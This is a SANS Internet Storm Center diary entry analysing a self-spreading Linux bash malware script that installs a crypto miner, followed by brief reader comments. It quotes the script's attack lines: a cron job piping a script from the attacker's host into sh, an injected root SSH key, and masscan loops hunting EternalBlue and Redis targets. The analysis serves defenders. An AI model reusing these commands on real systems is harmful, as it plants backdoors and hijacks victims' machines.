Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Malicious Bash Script with Multiple Features - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Malicious Bash Script with Multiple Features

It’s not common to find a complex malicious bash script. Usually, bash scripts are used to download a malicious executable and start it. This one has been spotted by @michalmalik[1] who twitted about it. I had a quick look at it. The script has currently a score of 13/50 on VT[2]. First of all, the script installs some tools and dependencies. 'apt-get' and 'yum'  are used, this means that multiple Linux distributions are targeted. The following packages are installed: wget, git, make, python, redis-tools, gcc, build-essentials. Some Python packages are installed via PIP.

The primary goal of the script is to install a crypto miner. To optimize performances, the number of CPUs is tested:

if [ $cpunum -gt 4 ];
then
threads=`expr $cpunum / 2`
else
threads=$cpunum

Three first files are downloaded:

hxxp://xksqu4mj.fri3nds[.]in/tools/clay
hxxp://xksqu4mj.fri3nds[.]in/tools/minerd
hxxp://xksqu4mj.fri3nds[.]in/tools/glibc-2.14.tar.gz

'clay' is a known trojan[3]. 'minerd' is, as the name says, a crypto miner[4]. This is an x64 binary. 'glib-2.14.tar.gz' (SHA256: 18d9a0296260fd9529d59229c1dcb130ee8a18a1dd71c23712c39056cc0eb0b3) contains the libraries required by minerd. The crypto miner uses stratum+tcp://pool.fri3nds.in:8080

Then crontab entries are added for persistence:

echo "*/5 * * * * curl -fsSL hxxp://xksqu4mj.fri3nds[.]in/tools/transfer.sh | sh" > /var/spool/cron/root

The nasty stuff is the installation of the attack SSH key:

echo "ssh-rsa AAAAB3N ...[redacted]... Mq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26" >> /root/.ssh/authorized_keys

I don't know why they add a key for the root user. By default, ssh does not allow root login. They should create a new user and add it to the 'sudo' group!

Then, Redis via port TCP/6379 (see below why):

PS3=$(iptables -L | grep 6379 | wc -l)
if [ $PS3 -eq 0 ];
then
yum -y install iptables-services
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
service iptables save
/etc/init.d/iptables-persistent save

The next step is to download the 'masscan' port scanner and another bunch of scripts:

hxxps://github[.]com/robertdavidgraham/masscan/archive/1.0.4.tar.gz
hxxp://xksqu4mj.fri3nds[.]in/tools/unixinfect.tar.gz

The tar file contains scripts which generate ranges of IP addresses and scan for EternalBlue[4] vulnerable hosts (Windows hosts):

#!/bin/bash
ython rangeip.py
while read line
do
    masscan -p445 $line --rate=20000 | tee -a masscan
    python order.py
    sh ebrun.sh
done < ip

For Linux hosts, Redis vulnerable instances are targeted:

#!/bin/bash
python rangeip.py
while read line
do
    masscan -p6379 $line --rate=20000 | tee -a masscan
    python order.py
    sh redisrun.sh
done < ip

The goal is to find new vulnerable hosts, pivot (lateral movement) and deploy the same script.

As a final note, some attackers are able to write "nice" (read: malicious code) but they still fail to protect their resources. All their material is available via directory indexing:

Credit to finding the script goes to Michal Malik[6].

[1] https://twitter.com/michalmalik/status/969634267532873728
[2] https://www.virustotal.com/en/file/ae71d81ed3a1f9a9f83c2973184dd6ab51ca4b5728ccfbab9885399e54379274/analysis/
[3] https://www.virustotal.com/intelligence/search/?query=260ef4f1bb0e26915a898745be873373f083227a4f996731f9a3885397a49e79
[4] https://www.virustotal.com/intelligence/search/?query=2d89b48ed09e68b1a228e08fd66508d349303f7dc5a0c26aa5144f69c65ce2f2
[5] https://isc.sans.edu/forums/diary/ETERNALBLUE+Windows+SMBv1+Exploit+Patched/22304/
[6] https://twitter.com/michalmalik

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

Xme

390 Posts
ISC Handler
Is "ython" something or is there actually a missing "p" in one of those scripts? Makes you wonder how it happened...
robv

9 Posts Posts
It's a typo (probably when I copy/paste the code and formated it to fit in the diary)
Xme

390 Posts Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!